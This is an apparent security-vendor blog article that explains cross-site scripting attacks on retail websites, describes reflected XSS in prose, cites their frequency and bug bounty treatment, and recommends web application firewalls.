The modern organization is extremely reliant upon its web presence. The average customer would much rather do their shopping from the comfort of their couch than go to a brick and mortar retail location to browse. Additionally, eCommerce has enabled businesses to expand their reach far beyond where they have physical outlets.
However, with this dependence comes vulnerability. If an organization’s website is the target of an attack, this can impact profitability and reputation and possibly bring the organization under regulatory scrutiny if the incident includes the breach of customers’ sensitive data. For this reason, retailers must defend themselves against a wide range of online attacks. In recent years, cross site scripting (XSS) attacks have pulled ahead to be one of the most commonly used exploits in existence.
What is Cross-Site Scripting?
Cross-site scripting attacks target vulnerable web pages. These attacks take advantage of how web pages are put together and use the rules of the HTML standard to insert malicious code into web pages. This malicious code can then be used for a variety of different purposes, including credit card skimming, theft of other browser data, crypto mining, and serving other malware to the user.
- Anatomy of a Web Page
Web pages are typically .html files. This file extension means that the primary type of code that the file contains is HTML. HTML is the language that defines the content and structure of a webpage. It will describe the various sections of the page, its content, and high-level information about how it should be displayed (various levels of headers, location, etc.).
These other types of content can either be placed in their own files that are imported and referenced from within the main HTML file or embedded directly in the HTML code. If embedded, the code needs to be properly tagged (using the <style></style> or <script></script> tags) and is run when the page is being rendered in the user’s browser.
- Inserting Malicious Code
The problem with the ability to import or embed script code in HTML pages is that it makes these pages vulnerable to exploitation. If an attacker can get their own malicious code embedded within a legitimate web page, it will be run whenever the web page is visited by a user. This is a cross-site scripting (XSS) attack.
XSS attacks come in a number of different varieties. Reflected XSS takes advantage of web pages that embed data from the URL in the page’s HTML code. An example of this would be a web page that greets the visitor by name and includes that name in the URL. Putting some malicious code in that URL as a “name” and sending a link to an unsuspecting user pulls off a simple XSS attack.
The Growth of Cross-Site Scripting
Cross-site scripting is an extremely common but often discounted or undervalued type of cyberattack. According to recent research, 40% of the online cyberattacks performed against European and North American retailers in 2019 included an XSS attack.
Despite the high rate of XSS attacks, many companies discount them as part of their bug bounty programs. The reason for this is that these vulnerabilities are unlikely to cause the massive data breaches that cause reputational damage and massive fines from the General Data Protection Regulation (GDPR) and other regulators.
However, this does not mean that an organization cannot suffer a massive breach due to an XSS vulnerability. Credit card skimmers often use XSS vulnerabilities to inject their malicious code into a webpage, and the famous British Airways breach demonstrates that these attacks can carry extremely high regulatory penalties.
Despite being undervalued in bug bounty programs, XSS vulnerabilities still account for the majority of bug bounty payouts. This underscores the growth of XSS as a threat to organizations’ website security. XSS vulnerabilities are more commonly being detected (and exploited) by bug bounty hunters and cybercriminals alike.
Defeating Cross-Site Scripting Attacks
Cross-site scripting is not a new type of web application vulnerability. It has been featured on the OWASP Top Ten List of web applications for multiple different iterations of the list (which is published roughly every 2-3 years). Despite this featured billing, the vulnerability persists in web application code since many developers do not receive the level of security training needed to identify and remediate these vulnerabilities in their code.
As a result, organizations must take additional steps to protect themselves against XSS vulnerabilities. For this, and other common web application vulnerabilities, deploying a web application firewall (WAF) is a good idea since it can identify and block potential exploitation of these vulnerabilities before they reach the vulnerable application. Deploying a leading WAF is a good idea since they commonly go well beyond the set of vulnerabilities that make OWASP’s list, providing more comprehensive protection to an organization’s web presence.